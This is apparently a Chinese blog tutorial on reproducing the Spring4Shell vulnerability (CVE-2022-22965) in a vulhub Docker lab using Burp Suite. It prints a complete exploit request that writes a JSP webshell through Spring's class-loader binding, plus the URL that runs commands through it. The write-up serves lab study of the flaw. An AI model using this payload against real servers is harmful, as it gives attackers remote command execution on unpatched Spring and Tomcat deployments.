Java 框架安全:Spring 漏洞序列.(CVE-2022-22965)

半个西瓜.2024-05-11 9:28

什么叫 Spring 框架.

Spring 框架是一个用于构建企业级应用程序的开源框架。它提供了一种全面的编程和配置模型,可以简化应用程序的开发过程。Spring 框架的核心特性包括依赖注入(Dependency Injection)、面向切面编程(Aspect-Oriented Programming)、声明式事务管理(Declarative Transaction Management)等。依赖注入是 Spring 框架的核心概念之一,它通过将对象之间的依赖关系外部化,使得对象之间的协作更加灵活和可测试。Spring 框架提供了多种方式来实现依赖注入,包括构造函数注入、Setter 方法注入和字段注入。

目录:

[什么叫 Spring 框架.](#什么叫 Spring 框架.)

[开启 漏洞 靶场:](#开启 漏洞 靶场:)

(1)查看目录:

[(2)启用 vulhub 漏洞:](#(2)启用 vulhub 漏洞:)

[(3)进行浏览:主机的 8080 端口.](#(3)进行浏览:主机的 8080 端口.)

[进行 漏洞 测试:](#进行 漏洞 测试:)

第一步:设置代理服务器

(1)设置代理服务器

[(2) 新建代理服务器,选择手动代理](#(2) 新建代理服务器,选择手动代理)

[(3)使用 刚刚设置的代理.](#(3)使用 刚刚设置的代理.)

第二步:执行进行抓包.

[(1)打开Burp,点击代理 设置监听的IP地址和端口](#(1)打开Burp,点击代理 设置监听的IP地址和端口)

第三步:进行漏洞测试.

开启 漏洞 靶场:

Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客

(1)查看目录:

复制代码 
(1)cd vulhub
 
(2)ls

(2)启用 vulhub 漏洞:

复制代码 
(1)cd spring                     // 切换到对应的漏洞目录.
 
(2)cd CVE-2022-22965              // 切换到对应的漏洞版本.

(3)docker-compose build           // 建立容器

(4)docker-compose up -d           //   启用漏洞环境.

(3)进行浏览:主机的 8080 端口.

进行 漏洞 测试:

第一步:设置代理服务器

(1)设置代理服务器(我用的是:OWASP浏览器,也可以用别的浏览器 设置代理服务器就行)

(2) 新建代理服务器,选择手动代理 设置127.0.0.1(为本地的IP地址),设置代理的端口8080

(3)使用 刚刚设置的代理.

第二步:执行进行抓包.

(1)打开Burp,点击代理 设置监听的IP地址和端口(就是刚刚浏览器设置的代理,127.0.0.1(是本地的IP地址),8080(是监听的端口))

(2)进行访问漏洞的链接.(使用 Burp抓包.)

复制代码 
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.32.132:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 	AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 		Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1

第三步:进行漏洞测试.

(1)访问刚才上传的 JSP webshell,并执行任意命令.

复制代码 
http://172.16.10.19:8080/tomcatwar.jsp?pwd=j&cmd=id

相关推荐
卓码软件测评1 小时前
【网站测试:CORS配置错误引发的安全风险及测试】
功能测试·安全·web安全·压力测试·可用性测试·安全性测试
猿究院--王升2 小时前
jvm三色标记
java·jvm·算法
妮妮学代码2 小时前
c#:TCP服务端管理类
java·tcp/ip·c#
兔老大RabbitMQ2 小时前
git pull origin master失败
java·开发语言·git
探索java3 小时前
Netty Channel详解:从原理到实践
java·后端·netty
吱吱企业安全通讯软件3 小时前
吱吱企业通讯软件保证内部通讯安全,搭建数字安全体系
大数据·网络·人工智能·安全·信息与通信·吱吱办公通讯
ciku4 小时前
Spring Ai Advisors
人工智能·spring·microsoft
tuokuac4 小时前
maven与maven-archetype-plugin版本匹配问题
java·maven
ankleless4 小时前
Spring Boot 实战:从项目搭建到部署优化
java·spring boot·后端
云边云科技4 小时前
零售行业新店网络零接触部署场景下,如何选择SDWAN
运维·服务器·网络·人工智能·安全·边缘计算·零售
热门推荐
01UV安装并设置国内源02DeepSeek更新!速览DeepSeek V3.1新特性03KGG转MP3工具|非KGM文件|解密音频04Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code05蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接06【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)07Claude Code VSCode集成开发指南:AI编程助手完整配置08Spring 调试终于不再痛苦了092025最新国内服务器可用docker源仓库地址大全(2025年8月更新)10【大模型实战篇】部署GPT-OSS-120B踩得坑(vllm / ollama等推理框架)